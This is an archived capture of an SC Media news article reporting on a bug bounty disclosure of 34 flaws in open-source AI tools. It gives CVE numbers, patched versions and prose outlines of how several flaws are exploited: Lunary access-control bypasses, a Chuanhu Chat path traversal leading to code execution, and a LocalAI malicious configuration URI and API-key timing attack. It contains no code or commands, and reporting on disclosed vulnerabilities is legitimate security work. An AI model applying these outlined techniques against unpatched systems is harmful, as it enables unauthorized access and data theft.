www.scworld.com Open in urlscan Pro
2606:4700:20::681a:546  Public Scan

Submitted URL: https://click.email.sans.org/?qs=25a294476a64e7b92ce238c2178b5791119625504c8e999f2b0b81d3a27192d40b619c5d7ea156d89a09ea1a203a...
Effective URL: https://www.scworld.com/news/ai-bug-bounty-program-yields-34-flaws-in-open-source-tools?is=393a7be63009b544039d114d66566...
Submission: On November 04 via api from RU — Scanned from DE

Form analysis 1 forms found in the DOM

<form class="w-100" scmag-registration="set">
  <div class="my-2 font-body"><label for="email" class="visually-hidden form-label col-form-label col">Business Email</label><input placeholder="Business Email*" required="" type="email" id="email" class="fs-7 text-black p-3 form-control" value="">
  </div>
  <div class="fs-9 my-4">
    <p>By clicking the Subscribe button below, you agree to <span class="text-nowrap">SC Media<!-- --> </span><a class="text-underline" target="_blank" href="https://www.cyberriskalliance.com/terms-of-use">Terms of Use</a><span> and
      </span><a class="text-underline" target="_blank" href="https://www.cyberriskalliance.com/terms-of-use#privacy-policy">Privacy Policy</a>.</p>
  </div>
  <div class="row"><button type="submit" class="col-6 btn btn-primary">Subscribe</button></div>
</form>

Text Content

Log inRegister
CISO Stories
Topics
Topic Hubs
Events
Podcasts
Research
Recognition
About
Open Search Bar

ADVERTISEMENT




AI/ML, Vulnerability Management, Patch/Configuration Management


AI BUG BOUNTY PROGRAM YIELDS 34 FLAWS IN OPEN-SOURCE TOOLS

October 29, 2024
Share

By Laura French

Adobe Stock

Nearly three dozen flaws in open-source AI and machine learning (ML) tools were
disclosed Tuesday as part of Protect AI’s huntr bug bounty program.

The discoveries include three critical vulnerabilities: two in the Lunary AI
developer toolkit and one in a graphical user interface (GUI) for ChatGPT called
Chuanhu Chat. The October vulnerability report also includes 18 high-severity
flaws ranging from denial-of-service (DoS) to remote code execution (RCE).

“Through our own research and the huntr community, we’ve found the tools used in
the supply chain to build the machine learning models that power AI applications
to be vulnerable to unique security threats,” stated Protect AI Security
Researchers Dan McInerney and Marcello Salvati. “These tools are Open Souce and
downloaded thousands of times a month to build enterprise AI Systems.”

Protect AI’s report also highlights vulnerabilities in LocalAI, a platform for
running AI models locally on consumer-grade hardware, LoLLMs, a web UI for
various AI systems, LangChain.js, a framework for developing language model
applications, and more.

ADVERTISEMENT




LUNARY AI FLAWS RISK MANIPULATION OF AUTHENTICATION, EXTERNAL USERS

Two of the most severe vulnerabilities disclosed Tuesday through the huntr
program are flaws in the Lunary AI production toolkit for developers of large
language model (LLM) chatbots. The open-source toolkit is used by “2500+ AI
developers at top companies,” according to the Lunary AI website.

The flaws are tracked as CVE-2024-7474 and CVE-2024-7475, and both have a CVSS
score of 9.1.

CVE-2024-7474 is an insecure direct object reference (IDOR) flaw that could
allow an authenticated user to view or delete the user records of any other
external user due to lack of proper access control checks for requests to the
relevant API endpoints. If the attacker knows another user’s user ID, they can
replace their own user ID with the victim’s when calling these API endpoints,
which enables them to view and delete user records as though they were their
own.

CVE-2024-7475 is also due to improper access control, this time with regard to
requests to the Security Assertion Markup Language (SAML) configuration
endpoint. This flaw enables attackers to user crafted POST requests to this
endpoint to maliciously update the SAML configuration, which can lead to
manipulation of authentication processes and potentially fraudulent logins.

Both flaws were addressed by Lunary and can be fixed by upgrading to Lunary
version 1.3.4.


CHUANHU CHAT, LOCALAI FLAWS COULD LEAD TO RCE, DATA LEAKAGE

An additional critical flaw disclosed in Protect AI’s report Tuesday is a path
traversal vulnerability in the user upload feature of Chuahu Chat, which could
enable RCE, arbitrary directory creation and leakage of information from CSV
files due to improper sanitization of certain inputs. The flaw is tracked as
CVE-2024-5982 and has a CVSS score of 9.1.

CVE-2024-5982 can be exploited to achieve RCE by creating a user with a name
that includes an absolute path and then uploading a file with a cron job
configuration through the Chuahu Chat interface. Additional modified user
requests can also be used to create arbitrary directories through the
“get_history_names” function and leak the first columns of CSV files through the
“load_template” function, Protect AI reports.

The Chuanhu Chat project has more than 15,200 stars and 2,300 forks on GitHub.
CVE-2024-5982 was fixed in Chuanhu Chat version 20240918.

LocalAI is another popular open-source AI project on GitHub with more than
24,000 stars and 1,900 forks. The huntr community discovered multiple
vulnerabilities in the platform, including an RCE flaw tracked as CVE-2024-6983
and timing attack vulnerability tracked as CVE-2024-7010.

CVE-2024-6983, which has a CVSS score of 8.8, enables an attacker to upload a
malicious configuration file with a uniform resource identifier (URI) that
points to a malicious binary hosted on an attacker-controlled server. The binary
is then executed when the configuration file is processed on the target system.

CVE-2024-7010, CVSS score 7.5, can enable a timing attack, which is a type of
side-channel attack that measures the response time of a server when processing
an API key. If an attacker were to set up a script that sends multiple API key
guesses to the server and records the response times for each key, they could
eventually predict the correct key to gain unauthorized access.

CVE-2024-6983 can be patched by upgrading to LocalAI version 2.19.4, while
fixing CVE-2024-7010 requires an upgrade to version 2.21.




AN IN-DEPTH GUIDE TO AI

Get essential knowledge and practical strategies to use AI to better your
security program.
Learn More
Laura French


RELATED


AI/ML

MICROSOFT RECALL LAUNCH POSTPONED ANEW

SC StaffNovember 1, 2024

Such postponement comes after Recall was subjected to several delays since June
due to security concerns associated with the feature, which has since been
allayed by Microsoft with its assurances of an opt-in experience, a completely
encrypted database, and Windows Hello-based authentication.

IoT

NEW ATTACK TECHNIQUES UTILIZED BY IRANIAN CYBER GROUP EMENNET PASARGAD

SC StaffNovember 1, 2024

Iranian cyber operation Emennet Pasargad was noted by the FBI, Department of
Treasury, and the Israel National Cyber Directorate to have leveraged updated
tradecraft, such as IP camera breaches and generative artificial intelligence,
in recent attacks, including its compromise of the Summer Olympics.

Generative AI

FIVE WAYS TO PROTECT AI MODELS

Stu SjouwermanOctober 30, 2024

Here’s how bad actors attack good AI models – and what to do about it.

Related Terms

BugBuffer OverflowDisassembly

ADVERTISEMENT




GET DAILY EMAIL UPDATES

SC Media's daily must-read of the most current and pressing daily news
Business Email

By clicking the Subscribe button below, you agree to SC Media Terms of Use and
Privacy Policy.

Subscribe

ADVERTISEMENT






--------------------------------------------------------------------------------

ABOUT US

SC MediaCyberRisk AllianceContact UsCareersPrivacy

GET INVOLVED

SubscribeContribute/SpeakAttend an eventJoin a peer groupPartner With Us

EXPLORE

Product reviewsResearchWhite papersWebcastsPodcasts

Copyright © 2024 CyberRisk Alliance, LLC All Rights Reserved. This material may
not be published, broadcast, rewritten or redistributed in any form without
prior authorization.

Your use of this website constitutes acceptance of CyberRisk Alliance Privacy
Policy and Terms of Use.

COOKIES

This website uses cookies to improve your experience, provide social media
features and deliver advertising offers that are relevant to you.

If you continue without changing your settings, you consent to our use of
cookies in accordance with our privacy policy. You may disable cookies.

Accept cookies